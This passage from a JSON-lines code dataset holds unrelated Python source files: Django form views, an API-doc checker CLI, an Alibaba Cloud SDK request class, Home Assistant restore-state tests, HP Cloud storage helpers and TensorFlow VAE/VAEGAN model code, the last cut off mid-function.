last_sitemap.question_count += 1\n last_sitemap.question_keys.insert(0, str(key))\n last_sitemap.put()\n \n \n @staticmethod\n def get_sitemaps():\n sitemaps = Sitemap.all().order('-created').fetch(500)\n return sitemaps\n \n @staticmethod\n @memcached('get_sitemap_by_id', 3600*24, lambda id : int(id) )\n def get_sitemap_by_id(id):\n entity = Sitemap.get_by_id(id)\n if entity:\n if entity.content:\n return entity.content\n else:\n return unicode(web.render.sitemap_questions(entity.question_keys))\n else:\n raise web.notfound()"} {"ext": "py", "sha": "1a2faefaf711c5ce913d8e0bc348eba0ebcc72e8", "content": "from django.shortcuts import render\nfrom django.contrib.auth.models import User\nfrom django.http import HttpResponse\nfrom .models import Form\nfrom .forms import ReqForm\nfrom .filters import FormFilter\nfrom django.http import HttpResponseRedirect\nfrom django.urls import reverse\nfrom django.shortcuts import redirect\n\ndef form(request):\n return render(request,'form.html')\ndef status(request):\n return render(request,'status.html')\ndef about(request):\n return render(request,'about.html')\ndef index(request):\n return render(request,'index.html')\ndef showformdata(request):\n if request.method=='POST':\n fm=ReqForm(request.POST)\n if fm.is_valid():\n em=fm.cleaned_data['email']\n cn=fm.cleaned_data['ClubName']\n rn=fm.cleaned_data['RepresentativeName']\n cn=fm.cleaned_data['Contact']\n df=fm.cleaned_data['req_date_from']\n dt=fm.cleaned_data['req_date_to']\n rt=fm.cleaned_data['req_type']\n rp=fm.cleaned_data['req_purpose']\n profile = fm.save(commit=False)\n profile.user = request.user\n profile.save()\n fm.save() \n fm=ReqForm() \n print(em) \n print(rn) \n else:\n fm=ReqForm()\n return render(request,'form.html',{'frm':fm})\n \ndef reqInfo(request):\n u=request.user\n if u.groups.filter(name='Managers').exists():\n req = Form.objects.all()\n print(req)\n print(\"this is a manager\")\n context={\n 'form':form,\n 'req': req\n }\n else:\n req = Form.objects.filter(user=request.user)\n print(req)\n print(\"normal user\")\n context={\n 'form':form,\n 'req': req\n }\n return render(request,'status.html',context)\n\ndef student_approve(request,user_id):\n val=Form.objects.get(id=user_id)\n val.alloted=1\n val.save()\n return HttpResponse(\"approved successfully\")\n\ndef student_disapprove(request,user_id):\n val=Form.objects.get(id=user_id)\n val.alloted=2\n val.save()\n return HttpResponse(\"disapproved successfully\")\n\ndef student_reset(request,user_id):\n val=Form.objects.get(id=user_id)\n val.alloted=0\n val.save()\n return HttpResponse(\"reset successfully\")\n# def write_view(request, *args, **kwargs):\n# val=Form.objects.get(id=user_id)\n# if request.is_ajax() and request.method == \"POST\":\n# texteditor = request.POST['TextEntered']\n# val.Management_Comments='texteditor'\n# print(texteditor)\n# ## Don't forget to do validation and cleanup on texteditor to avoid security hassles \n# ## Do your logic here\n# SuccessAcknowledgment = {\"Acknowledged\":\"Acknowledged\"}\n# return HttpResponse(json.dumps(SuccessAcknowledgment))\n# else:\n# return render(request, \"write.html\")\ndef reqInfoMess(request):\n u=request.user\n if u.groups.filter(name='Managers').exists():\n req = Form.objects.all()\n print(req)\n print(\"this is a manager\")\n context={\n 'form':form,\n 'req': req\n }\n else:\n req = Form.objects.filter(user=request.user)\n print(req)\n print(\"normal user\")\n context={\n 'form':form,\n 'req': req\n }\n return render(request,'status.html',context)\n\ndef showmess(request, user_id):\n u=request.user\n if request.method=='POST':\n fm=mess(request.POST)\n ms=\"\"\n if fm.is_valid():\n ms=fm.cleaned_data['Management_Comments']\n u = fm.save(commit=False)\n #profile.user = request.user\n u.save()\n fm.save() \n fm=mess() \n print(ms) \n return render(request,'status.html',{'mess':ms})\n"} {"ext": "py", "sha": "1a2faf341daa8b57f34a09cec3003b1557907096", "content": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# License: BSD-3 (https://tldrlegal.com/license/bsd-3-clause-license-(revised))\n# Copyright (c) 2016-2021, Cabral, Juan; Luczywo, Nadia\n# All rights reserved.\n\n# =============================================================================\n# DOCS\n# =============================================================================\n\n\"\"\"Tool to check if each python module has a corresponding API docs.\"\"\"\n\n# =============================================================================\n# IMPORTS\n# =============================================================================\n\nimport inspect\nimport pathlib\n\nimport attr\n\nimport typer\n\n# =============================================================================\n# CONSTANTS\n# =============================================================================\n\nVERSION = \"0.1\"\n\n# =============================================================================\n# FUNCTIONS\n# =============================================================================\n\n\ndef check_apidoc_structure(apidoc_dir, reference_dir):\n\n apidoc_dir = pathlib.Path(apidoc_dir)\n reference_dir = pathlib.Path(reference_dir)\n\n if not apidoc_dir.exists():\n raise OSError(f\"'{apidoc_dir}' do no exist\")\n if not reference_dir.exists():\n raise OSError(f\"'{reference_dir}' do no exist\")\n\n reference = list(reference_dir.glob(\"**/*.py\"))\n\n result = {}\n for ref in reference:\n\n # essentially we remove the parent dir\n *dirs, ref_name = ref.relative_to(reference_dir).parts\n\n if ref_name == \"__init__.py\":\n ref_name = \"index.py\"\n\n search_dir = apidoc_dir\n for subdir in dirs:\n search_dir /= subdir\n\n search = search_dir / f\"{ref_name[:-3]}.rst\"\n\n result[str(ref)] = (str(search), search.exists())\n\n return result\n\n\n# =============================================================================\n# CLI\n# =============================================================================\n\n\n@attr.s(frozen=True)\nclass CLI:\n \"\"\"Check if the structure of API doc directory is equivalent to those of\n the project.\n\n \"\"\"\n\n footnotes = \"\\n\".join(\n [\n \"This software is under the BSD 3-Clause License.\",\n \"Copyright (c) 2021, Juan Cabral.\",\n \"For bug reporting or other instructions please check:\"\n \" https://github.com/quatrope/scikit-criteria\",\n ]\n )\n\n run = attr.ib(init=False)\n\n @run.default\n def _set_run_default(self):\n app = typer.Typer()\n for k in dir(self):\n if k.startswith(\"_\"):\n continue\n v = getattr(self, k)\n if inspect.ismethod(v):\n decorator = app.command()\n decorator(v)\n return app\n\n def version(self):\n \"\"\"Print checktestdir.py version.\"\"\"\n typer.echo(f\"{__file__ } v.{VERSION}\")\n\n def check(\n self,\n test_dir: str = typer.Argument(\n ..., help=\"Path to the api-doc structure.\"\n ),\n reference_dir: str = typer.Option(\n ..., help=\"Path to the reference structure.\"\n ),\n verbose: bool = typer.Option(\n default=False, help=\"Show all the result\"\n ),\n ):\n \"\"\"Check if the structure of test directory is equivalent to those\n of the project.\n\n \"\"\"\n try:\n check_result = check_apidoc_structure(test_dir, reference_dir)\n except Exception as err:\n typer.echo(typer.style(str(err), fg=typer.colors.RED))\n raise typer.Exit(code=1)\n\n all_tests_exists = True\n for ref, test_result in check_result.items():\n\n test, test_exists = test_result\n\n if test_exists:\n fg = typer.colors.GREEN\n status = \"\"\n else:\n all_tests_exists = False\n fg = typer.colors.RED\n status = typer.style(\"[NOT FOUND]\", fg=typer.colors.YELLOW)\n\n if verbose or not test_exists:\n msg = f\"{ref} -> {test} {status}\"\n typer.echo(typer.style(msg, fg=fg))\n\n if all_tests_exists:\n final_fg = typer.colors.GREEN\n final_status = \"Test structure ok!\"\n exit_code = 0\n else:\n final_fg = typer.colors.RED\n final_status = \"Structure not equivalent!\"\n exit_code = 1\n\n typer.echo(\"-------------------------------------\")\n typer.echo(typer.style(final_status, fg=final_fg))\n raise typer.Exit(code=exit_code)\n\n\ndef main():\n \"\"\"Run the checkapidocdir.py cli interface.\"\"\"\n cli = CLI()\n cli.run()\n\n\nif __name__ == \"__main__\":\n main()\n"} {"ext": "py", "sha": "1a2fb1887626cf76c536e2f273cf98f4340ebff5", "content": "# Licensed to the Apache Software Foundation (ASF) under one\r\n# or more contributor license agreements. See the NOTICE file\r\n# distributed with this work for additional information\r\n# regarding copyright ownership. The ASF licenses this file\r\n# to you under the Apache License, Version 2.0 (the\r\n# \"License\"); you may not use this file except in compliance\r\n# with the License. You may obtain a copy of the License at\r\n#\r\n#\r\n# http://www.apache.org/licenses/LICENSE-2.0\r\n#\r\n#\r\n# Unless required by applicable law or agreed to in writing,\r\n# software distributed under the License is distributed on an\r\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\r\n# KIND, either express or implied. See the License for the\r\n# specific language governing permissions and limitations\r\n# under the License.\r\n\r\nfrom aliyunsdkcore.request import RpcRequest\nfrom aliyunsdkemr.endpoint import endpoint_data\r\n\r\nclass ListRequiredServiceRequest(RpcRequest):\r\n\r\n\tdef __init__(self):\r\n\t\tRpcRequest.__init__(self, 'Emr', '2016-04-08', 'ListRequiredService','emr')\r\n\t\tif hasattr(self, \"endpoint_map\"):\r\n\t\t\tsetattr(self, \"endpoint_map\", endpoint_data.getEndpointMap())\r\n\t\tif hasattr(self, \"endpoint_regional\"):\r\n\t\t\tsetattr(self, \"endpoint_regional\", endpoint_data.getEndpointRegional())\r\n\r\n\r\n\tdef get_ResourceOwnerId(self):\r\n\t\treturn self.get_query_params().get('ResourceOwnerId')\r\n\r\n\tdef set_ResourceOwnerId(self,ResourceOwnerId):\r\n\t\tself.add_query_param('ResourceOwnerId',ResourceOwnerId)\r\n\r\n\tdef get_EmrVersion(self):\r\n\t\treturn self.get_query_params().get('EmrVersion')\r\n\r\n\tdef set_EmrVersion(self,EmrVersion):\r\n\t\tself.add_query_param('EmrVersion',EmrVersion)\r\n\r\n\tdef get_ServiceNameList(self):\r\n\t\treturn self.get_query_params().get('ServiceNameList')\r\n\r\n\tdef set_ServiceNameList(self,ServiceNameList):\r\n\t\tself.add_query_param('ServiceNameList',ServiceNameList)"} {"ext": "py", "sha": "1a2fb2f57b569902970daef785ec480eca5e29b4", "content": "\"\"\"The tests for the Restore component.\"\"\"\nfrom datetime import datetime\nfrom unittest.mock import patch\n\nfrom homeassistant.const import EVENT_HOMEASSISTANT_START\nfrom homeassistant.core import CoreState, State\nfrom homeassistant.exceptions import HomeAssistantError\nfrom homeassistant.helpers.entity import Entity\nfrom homeassistant.helpers.restore_state import (\n DATA_RESTORE_STATE_TASK,\n STORAGE_KEY,\n RestoreEntity,\n RestoreStateData,\n StoredState,\n)\nfrom homeassistant.util import dt as dt_util\n\n\nasync def test_caching_data(hass):\n \"\"\"Test that we cache data.\"\"\"\n now = dt_util.utcnow()\n stored_states = [\n StoredState(State(\"input_boolean.b0\", \"on\"), now),\n StoredState(State(\"input_boolean.b1\", \"on\"), now),\n StoredState(State(\"input_boolean.b2\", \"on\"), now),\n ]\n\n data = await RestoreStateData.async_get_instance(hass)\n await hass.async_block_till_done()\n await data.store.async_save([state.as_dict() for state in stored_states])\n\n # Emulate a fresh load\n hass.data[DATA_RESTORE_STATE_TASK] = None\n\n entity = RestoreEntity()\n entity.hass = hass\n entity.entity_id = \"input_boolean.b1\"\n\n # Mock that only b1 is present this run\n with patch(\n \"homeassistant.helpers.restore_state.Store.async_save\"\n ) as mock_write_data:\n state = await entity.async_get_last_state()\n await hass.async_block_till_done()\n\n assert state is not None\n assert state.entity_id == \"input_boolean.b1\"\n assert state.state == \"on\"\n\n assert mock_write_data.called\n\n\nasync def test_hass_starting(hass):\n \"\"\"Test that we cache data.\"\"\"\n hass.state = CoreState.starting\n\n now = dt_util.utcnow()\n stored_states = [\n StoredState(State(\"input_boolean.b0\", \"on\"), now),\n StoredState(State(\"input_boolean.b1\", \"on\"), now),\n StoredState(State(\"input_boolean.b2\", \"on\"), now),\n ]\n\n data = await RestoreStateData.async_get_instance(hass)\n await hass.async_block_till_done()\n await data.store.async_save([state.as_dict() for state in stored_states])\n\n # Emulate a fresh load\n hass.data[DATA_RESTORE_STATE_TASK] = None\n\n entity = RestoreEntity()\n entity.hass = hass\n entity.entity_id = \"input_boolean.b1\"\n\n # Mock that only b1 is present this run\n states = [State(\"input_boolean.b1\", \"on\")]\n with patch(\n \"homeassistant.helpers.restore_state.Store.async_save\"\n ) as mock_write_data, patch.object(hass.states, \"async_all\", return_value=states):\n state = await entity.async_get_last_state()\n await hass.async_block_till_done()\n\n assert state is not None\n assert state.entity_id == \"input_boolean.b1\"\n assert state.state == \"on\"\n\n # Assert that no data was written yet, since hass is still starting.\n assert not mock_write_data.called\n\n # Finish hass startup\n with patch(\n \"homeassistant.helpers.restore_state.Store.async_save\"\n ) as mock_write_data:\n hass.bus.async_fire(EVENT_HOMEASSISTANT_START)\n await hass.async_block_till_done()\n\n # Assert that this session states were written\n assert mock_write_data.called\n\n\nasync def test_dump_data(hass):\n \"\"\"Test that we cache data.\"\"\"\n states = [\n State(\"input_boolean.b0\", \"on\"),\n State(\"input_boolean.b1\", \"on\"),\n State(\"input_boolean.b2\", \"on\"),\n State(\"input_boolean.b5\", \"unavailable\", {\"restored\": True}),\n ]\n\n entity = Entity()\n entity.hass = hass\n entity.entity_id = \"input_boolean.b0\"\n await entity.async_internal_added_to_hass()\n\n entity = RestoreEntity()\n entity.hass = hass\n entity.entity_id = \"input_boolean.b1\"\n await entity.async_internal_added_to_hass()\n\n data = await RestoreStateData.async_get_instance(hass)\n now = dt_util.utcnow()\n data.last_states = {\n \"input_boolean.b0\": StoredState(State(\"input_boolean.b0\", \"off\"), now),\n \"input_boolean.b1\": StoredState(State(\"input_boolean.b1\", \"off\"), now),\n \"input_boolean.b2\": StoredState(State(\"input_boolean.b2\", \"off\"), now),\n \"input_boolean.b3\": StoredState(State(\"input_boolean.b3\", \"off\"), now),\n \"input_boolean.b4\": StoredState(\n State(\"input_boolean.b4\", \"off\"),\n datetime(1985, 10, 26, 1, 22, tzinfo=dt_util.UTC),\n ),\n \"input_boolean.b5\": StoredState(State(\"input_boolean.b5\", \"off\"), now),\n }\n\n with patch(\n \"homeassistant.helpers.restore_state.Store.async_save\"\n ) as mock_write_data, patch.object(hass.states, \"async_all\", return_value=states):\n await data.async_dump_states()\n\n assert mock_write_data.called\n args = mock_write_data.mock_calls[0][1]\n written_states = args[0]\n\n # b0 should not be written, since it didn't extend RestoreEntity\n # b1 should be written, since it is present in the current run\n # b2 should not be written, since it is not registered with the helper\n # b3 should be written, since it is still not expired\n # b4 should not be written, since it is now expired\n # b5 should be written, since current state is restored by entity registry\n assert len(written_states) == 3\n assert written_states[0][\"state\"][\"entity_id\"] == \"input_boolean.b1\"\n assert written_states[0][\"state\"][\"state\"] == \"on\"\n assert written_states[1][\"state\"][\"entity_id\"] == \"input_boolean.b3\"\n assert written_states[1][\"state\"][\"state\"] == \"off\"\n assert written_states[2][\"state\"][\"entity_id\"] == \"input_boolean.b5\"\n assert written_states[2][\"state\"][\"state\"] == \"off\"\n\n # Test that removed entities are not persisted\n await entity.async_remove()\n\n with patch(\n \"homeassistant.helpers.restore_state.Store.async_save\"\n ) as mock_write_data, patch.object(hass.states, \"async_all\", return_value=states):\n await data.async_dump_states()\n\n assert mock_write_data.called\n args = mock_write_data.mock_calls[0][1]\n written_states = args[0]\n assert len(written_states) == 2\n assert written_states[0][\"state\"][\"entity_id\"] == \"input_boolean.b3\"\n assert written_states[0][\"state\"][\"state\"] == \"off\"\n assert written_states[1][\"state\"][\"entity_id\"] == \"input_boolean.b5\"\n assert written_states[1][\"state\"][\"state\"] == \"off\"\n\n\nasync def test_dump_error(hass):\n \"\"\"Test that we cache data.\"\"\"\n states = [\n State(\"input_boolean.b0\", \"on\"),\n State(\"input_boolean.b1\", \"on\"),\n State(\"input_boolean.b2\", \"on\"),\n ]\n\n entity = Entity()\n entity.hass = hass\n entity.entity_id = \"input_boolean.b0\"\n await entity.async_internal_added_to_hass()\n\n entity = RestoreEntity()\n entity.hass = hass\n entity.entity_id = \"input_boolean.b1\"\n await entity.async_internal_added_to_hass()\n\n data = await RestoreStateData.async_get_instance(hass)\n\n with patch(\n \"homeassistant.helpers.restore_state.Store.async_save\",\n side_effect=HomeAssistantError,\n ) as mock_write_data, patch.object(hass.states, \"async_all\", return_value=states):\n await data.async_dump_states()\n\n assert mock_write_data.called\n\n\nasync def test_load_error(hass):\n \"\"\"Test that we cache data.\"\"\"\n entity = RestoreEntity()\n entity.hass = hass\n entity.entity_id = \"input_boolean.b1\"\n\n with patch(\n \"homeassistant.helpers.storage.Store.async_load\",\n side_effect=HomeAssistantError,\n ):\n state = await entity.async_get_last_state()\n\n assert state is None\n\n\nasync def test_state_saved_on_remove(hass):\n \"\"\"Test that we save entity state on removal.\"\"\"\n entity = RestoreEntity()\n entity.hass = hass\n entity.entity_id = \"input_boolean.b0\"\n await entity.async_internal_added_to_hass()\n\n now = dt_util.utcnow()\n hass.states.async_set(\n \"input_boolean.b0\", \"on\", {\"complicated\": {\"value\": {1, 2, now}}}\n )\n\n data = await RestoreStateData.async_get_instance(hass)\n\n # No last states should currently be saved\n assert not data.last_states\n\n await entity.async_remove()\n\n # We should store the input boolean state when it is removed\n state = data.last_states[\"input_boolean.b0\"].state\n assert state.state == \"on\"\n assert isinstance(state.attributes[\"complicated\"][\"value\"], list)\n assert set(state.attributes[\"complicated\"][\"value\"]) == {1, 2, now.isoformat()}\n\n\nasync def test_restoring_invalid_entity_id(hass, hass_storage):\n \"\"\"Test restoring invalid entity IDs.\"\"\"\n entity = RestoreEntity()\n entity.hass = hass\n entity.entity_id = \"test.invalid__entity_id\"\n now = dt_util.utcnow().isoformat()\n hass_storage[STORAGE_KEY] = {\n \"version\": 1,\n \"key\": STORAGE_KEY,\n \"data\": [\n {\n \"state\": {\n \"entity_id\": \"test.invalid__entity_id\",\n \"state\": \"off\",\n \"attributes\": {},\n \"last_changed\": now,\n \"last_updated\": now,\n \"context\": {\n \"id\": \"3c2243ff5f30447eb12e7348cfd5b8ff\",\n \"user_id\": None,\n },\n },\n \"last_seen\": dt_util.utcnow().isoformat(),\n }\n ],\n }\n\n state = await entity.async_get_last_state()\n assert state is None\n"} {"ext": "py", "sha": "1a2fb3864acac51c2808eb3aa0e7ffbcde0d3200", "content": "\"\"\"Implement a query class.\"\"\"\nfrom dataclasses import dataclass\nfrom typing import List, Container\nfrom .keyword import Keyword\nfrom .first_class_collection import FirstClassSequence\n\n\n@dataclass\nclass Query(FirstClassSequence):\n \"\"\"Represent a query.\"\"\"\n\n keywords: List[Keyword]\n\n @property\n def sequence(self):\n \"\"\"Return :py:attr:`keywords`.\"\"\"\n return self.keywords\n\n def get_query_filtered_by_container(self, container: Container[str]):\n \"\"\"Filter by a container.\n\n Returns\n -------\n Query\n\n \"\"\"\n return Query([keyword for keyword in self.keywords\n if keyword.keyword in container])\n"} {"ext": "py", "sha": "1a2fb470ba622f19ebdc5d1aa4ba2b377e0a971f", "content": "import hmac\nfrom hashlib import sha1\nfrom time import time\nimport urllib2\nimport simplejson\n\nfrom django.conf import settings\nfrom django_hpcloud.models import AuthToken\n\ndef generate_form_post_key(path, redirect,\n expires=2147483647,\n max_file_size=1073741824,\n method='POST'):\n '''\n Generates the key for the FormPOST signatures. This is used for the file\n upload forms.\n\n :param path: :class:`str` The path of the directory to upload to, this should\n not include the name of the file you're uploading.\n :param expires: :class:`int` The Unix timestamp of the expiry date of the form.\n :param max_file_size: :class:`int` The maximum file size of the files allowed\n to be uploaded with this form.\n :param method: :class:`str` The method which the form will be using, defaults to\n POST because that's all that's supported but allows\n others just in case.\n '''\n path = \"/v1/%s/%s/\" % (settings.TENANT_ID, path)\n hmac_body = \"%s\\n%s\\n%s\\n%s\\n%s\" % (\n path, redirect, max_file_size, \"10\", expires,\n )\n return \"%s:%s:%s\" % (\n settings.TENANT_ID, settings.HP_ACCESS_KEY,\n hmac.new(settings.HP_SECRET_KEY, hmac_body, sha1).hexdigest()\n )\n\ndef generate_share_url(path, expires=2147483647):\n '''\n Generates the URL for which you can create a time-sensitive link to any item\n in your object store.\n\n :param expires: :class:`int` The Unix timestamp of the expiry date of the form.\n '''\n hmac_path = \"/v1/%s/%s\" % (settings.TENANT_ID, path)\n hmac_body = \"%s\\n%s\\n%s\" % (\"GET\",expires, hmac_path)\n hmac_code = \"%s:%s:%s\" % (\n settings.TENANT_ID, settings.HP_ACCESS_KEY,\n hmac.new(settings.HP_SECRET_KEY, hmac_body, sha1).hexdigest()\n )\n path = \"%s%s/%s?temp_url_sig=%s&temp_url_expires=%s\" % (\n settings.OBJECT_STORE_URL, settings.TENANT_ID, path,\n hmac_code, expires)\n return path\n\ndef get_object_list(container):\n '''Returns a list of objects inside a container.\n\n :param container: :class:`str` The name of the container to list.\n '''\n container = \"%s%s/%s?format=json\" % (settings.OBJECT_STORE_URL, settings.TENANT_ID, container)\n req = urllib2.Request(container)\n req.add_header(\"Content-type\", \"application/json\")\n req.add_header(\"X-Auth-Token\", get_auth_token())\n response = urllib2.urlopen(req)\n return simplejson.loads(response.read())\n\ndef get_auth_token():\n '''Returns the auth_token currently being used.\n\n If the auth_token has expired, it will generate a new one and return that.\n '''\n if AuthToken.objects.all().count() > 0:\n token = AuthToken.objects.all()[0]\n if token.is_valid():\n return token.token\n AuthToken.objects.all().delete()\n json_data = {\n \"auth\": {\n \"passwordCredentials\": {\n \"username\": settings.HPCLOUD_USERNAME,\n \"password\": settings.HPCLOUD_PASSWORD\n },\n \"tenantId\": settings.TENANT_ID\n }\n }\n payload = simplejson.dumps(json_data)\n req = urllib2.Request(\n settings.REGION_URL + \"tokens\",\n )\n req.add_header(\"Content-type\", \"application/json\")\n json = simplejson.loads(urllib2.urlopen(req, payload).read())\n AuthToken(token=json['access']['token']['id'],\n expires=json['access']['token']['expires']).save()\n return json['access']['token']['id']\n"} {"ext": "py", "sha": "1a2fb594f98416859fabd33085c931d2e5be1adb", "content": "import numpy as np\n\nimport tensorflow as tf\n\nfrom tensorflow.keras.layers import Input, Conv2D, Flatten, Dense, Conv2DTranspose, Lambda, Reshape, Layer\nfrom tensorflow.keras.models import Model\nfrom tensorflow.keras.optimizers import Adam\nfrom tensorflow.keras import backend as K\n\nINPUT_DIM = (64,64,3)\n\nCONV_FILTERS = [32,64,64, 128]\nCONV_KERNEL_SIZES = [4,4,4,4]\nCONV_STRIDES = [2,2,2,2]\nCONV_ACTIVATIONS = ['relu','relu','relu','relu']\n\nDENSE_SIZE = 1024\n\nCONV_T_FILTERS = [64,64,32,3]\nCONV_T_KERNEL_SIZES = [5,5,6,6]\nCONV_T_STRIDES = [2,2,2,2]\nCONV_T_ACTIVATIONS = ['relu','relu','relu','sigmoid']\n\nZ_DIM = 32\n\nBATCH_SIZE = 100\nLEARNING_RATE = 0.0001\nKL_TOLERANCE = 0.5\n\n\n\n\nclass Sampling(Layer):\n def call(self, inputs):\n mu, log_var = inputs\n epsilon = K.random_normal(shape=K.shape(mu), mean=0., stddev=1.)\n return mu + K.exp(log_var / 2) * epsilon\n\n\nclass VAEModel(Model):\n def __init__(self, encoder, decoder, r_loss_factor, **kwargs):\n super(VAEModel, self).__init__(**kwargs)\n self.encoder = encoder\n self.decoder = decoder\n self.r_loss_factor = r_loss_factor\n\n def train_step(self, data):\n if isinstance(data, tuple):\n data = data[0]\n with tf.GradientTape() as tape:\n z_mean, z_log_var, z = self.encoder(data)\n reconstruction = self.decoder(z)\n reconstruction_loss = tf.reduce_mean(\n tf.square(data - reconstruction), axis = [1,2,3]\n )\n reconstruction_loss *= self.r_loss_factor\n kl_loss = 1 + z_log_var - tf.square(z_mean) - tf.exp(z_log_var)\n kl_loss = tf.reduce_sum(kl_loss, axis = 1)\n kl_loss *= -0.5\n total_loss = reconstruction_loss + kl_loss\n grads = tape.gradient(total_loss, self.trainable_weights)\n self.optimizer.apply_gradients(zip(grads, self.trainable_weights))\n return {\n \"loss\": total_loss,\n \"reconstruction_loss\": reconstruction_loss,\n \"kl_loss\": kl_loss,\n }\n \n def call(self,inputs):\n latent = self.encoder(inputs)\n return self.decoder(latent)\n\nclass VAEGAN(tf.keras.Model):\n \"\"\"a VAEGAN class for tensorflow\n \n Extends:\n tf.keras.Model\n \"\"\"\n\n def __init__(self, **kwargs):\n super(VAEGAN, self).__init__()\n self.__dict__.update(kwargs)\n\n self.enc = tf.keras.Sequential(self.enc)\n self.dec = tf.keras.Sequential(self.dec)\n inputs, disc_l, outputs = self.vae_disc_function()\n self.disc = tf.keras.Model(inputs=[inputs], outputs=[outputs, disc_l])\n\n self.enc_optimizer = tf.keras.optimizers.Adam(self.lr_base_gen, beta_1=0.5)\n self.dec_optimizer = tf.keras.optimizers.Adam(self.lr_base_gen, beta_1=0.5)\n self.disc_optimizer = tf.keras.optimizers.Adam(self.get_lr_d, beta_1=0.5)\n\n def encode(self, x):\n mu, sigma = tf.split(self.enc(x), num_or_size_splits=2, axis=1)\n return mu, sigma\n\n def dist_encode(self, x):\n mu, sigma = self.encode(x)\n return ds.MultivariateNormalDiag(loc=mu, scale_diag=sigma)\n\n def get_lr_d(self):\n return self.lr_base_disc * self.D_prop\n\n def decode(self, z):\n return self.dec(z)\n\n def discriminate(self, x):\n return self.disc(x)\n\n def reconstruct(self, x):\n mean, _ = self.encode(x)\n return self.decode(mean)\n\n def reparameterize(self, mean, logvar):\n eps = tf.random.normal(shape=mean.shape)\n return eps * tf.exp(logvar * 0.5) + mean\n\n # @tf.function\n def compute_loss(self, x):\n # pass through network\n q_z = self.dist_encode(x)\n z = q_z.sample()\n p_z = ds.MultivariateNormalDiag(\n loc=[0.0] * z.shape[-1], scale_diag=[1.0] * z.shape[-1]\n )\n xg = self.decode(z)\n z_samp = tf.random.normal([x.shape[0], 1, 1, z.shape[-1]])\n xg_samp = self.decode(z_samp)\n d_xg, ld_xg = self.discriminate(xg)\n d_x, ld_x = self.discriminate(x)\n d_xg_samp, ld_xg_samp = self.discriminate(xg_samp)\n\n # GAN losses\n disc_real_loss = gan_loss(logits=d_x, is_real=True)\n disc_fake_loss = gan_loss(logits=d_xg_samp, is_real=False)\n gen_fake_loss = gan_loss(logits=d_xg_samp, is_real=True)\n\n discrim_layer_recon_loss = (\n tf.reduce_mean(tf.reduce_mean(tf.math.square(ld_x - ld_xg), axis=0))\n / self.recon_loss_div\n )\n\n self.D_prop = sigmoid(\n disc_fake_loss - gen_fake_loss, shift=0.0, mult=self.sig_mult\n )\n\n kl_div = ds.kl_divergence(q_z, p_z)\n latent_loss = tf.reduce_mean(tf.maximum(kl_div, 0)) / self.latent_loss_div\n\n return (\n self.D_prop,\n latent_loss,\n discrim_layer_recon_loss,\n gen_fake_loss,\n disc_fake_loss,\n disc_real_loss,\n )\n\n # @tf.function\n def compute_gradients(self, x):\n with tf.GradientTape() as enc_tape, tf.GradientTape() as dec_tape, tf.GradientTape() as disc_tape:\n (\n _,\n latent_loss,\n discrim_layer_recon_loss,\n gen_fake_loss,\n disc_fake_loss,\n disc_real_loss,\n ) = self.compute_loss(x)\n\n enc_loss = latent_loss + discrim_layer_recon_loss\n dec_loss = gen_fake_loss + discrim_layer_recon_loss\n disc_loss = disc_fake_loss + disc_real_loss\n\n enc_gradients = enc_tape.gradient(enc_loss, self.enc.trainable_variables)\n dec_gradients = dec_tape.gradient(dec_loss, self.dec.trainable_variables)\n disc_gradients = disc_tape.gradient(disc_loss, self.disc.trainable_variables)\n\n return enc_gradients, dec_gradients, disc_gradients\n\n @tf.function\n def apply_gradients(self, enc_gradients, dec_gradients, disc_gradients):\n self.enc_optimizer.apply_gradients(\n zip(enc_gradients, self.enc.trainable_variables)\n )\n self.dec_optimizer.apply_gradients(\n zip(dec_gradients, self.dec.trainable_variables)\n )\n self.disc_optimizer.apply_gradients(\n zip(disc_gradients, self.disc.trainable_variables)\n )\n\n def train(self, x):\n enc_gradients, dec_gradients, disc_gradients = self.compute_gradients(x)\n self.apply_gradients(enc_gradients, dec_gradients, disc_gradients)\n\n\ndef gan_loss(logits, is_real=True):\n \"\"\"Computes standard gan loss between logits and labels\n \n Arguments:\n logits {[type]} -- output of discriminator\n \n Keyword Arguments:\n isreal {bool} -- whether labels should be 0 (fake) or 1 (real) (default: {True})\n \"\"\"\n if is_real:\n labels = tf.ones_like(logits)\n else:\n labels = tf.zeros_like(logits)\n\n return tf.compat.v1.losses.sigmoid_cross_entropy(\n multi_class_labels=labels, logits=logits\n )\n\n\ndef sigmoid(x, shift=0.0, mult=20):\n \"\"\" squashes a value with a sigmoid\n \"\"\"\n return tf.constant(1.0) / (\n tf.constant(1.0) + tf.exp(-tf.constant(1.0) * (x * mult))\n )\n\n\nclass VAE():\n def __init__(self):\n self.models = self._build()\n self.full_model = self.models[0]\n self.encoder = self.models[1]\n self.decoder = self.models[2]\n\n self.input_dim = INPUT_DIM\n self.z_dim = Z_DIM\n self.learning_rate = LEARNING_RATE\n self.kl_tolerance = KL_TOLERANCE\n\n def _build(self):\n vae_x = Input(shape=INPUT_DIM, name='observation_input')\n vae_c1 = Conv2D(filters = CONV_FILTERS[0], kernel_size = CONV_KERNEL_SIZES[0], strides = CONV_STRIDES[0], activation=CONV_ACTIVATIONS[0], name='conv_layer_1')(vae_x)\n vae_c2 = Conv2D(filters = CONV_FILTERS[1], kernel_size = CONV_KERNEL_SIZES[1], strides = CONV_STRIDES[1], activation=CONV_ACTIVATIONS[0], name='conv_layer_2')(vae_c1)\n vae_c3= Conv2D(filters = CONV_FILTERS[2], kernel_size = CONV_KERNEL_SIZES[2], strides = CONV_STRIDES[2], activation=CONV_ACTIVATIONS[0], name='conv_layer_3')(vae_c2)\n vae_c4= Conv2D(filters = CONV_FILTERS[3], kernel_size = CONV_KERNEL_SIZES[3], strides = CONV_STRIDES[3], activation=CONV_ACTIVATIONS[0], name='conv_layer_4')(vae_c3)\n\n vae_z_in = Flatten()(vae_c4)\n\n vae_z_mean = Dense(Z_DIM, name='mu')(vae_z_in)\n vae_z_log_var = Dense(Z_DIM, name='log_var')(vae_z_in)\n\n vae_z = Sampling(name='z')([vae_z_mean, vae_z_log_var])\n \n\n #### DECODER: \n vae_z_input = Input(shape=(Z_DIM,), name='z_input')\n\n vae_dense = Dense(1024, name='dense_layer')(vae_z_input)\n vae_unflatten = Reshape((1,1,DENSE_SIZE), name='unflatten')(vae_dense)\n vae_d1 = Conv2DTranspose(filters = CONV_T_FILTERS[0], kernel_size = CONV_T_KERNEL_SIZES[0] , strides = CONV_T_STRIDES[0], activation=CONV_T_ACTIVATIONS[0], name='deconv_layer_1')(vae_unflatten)\n 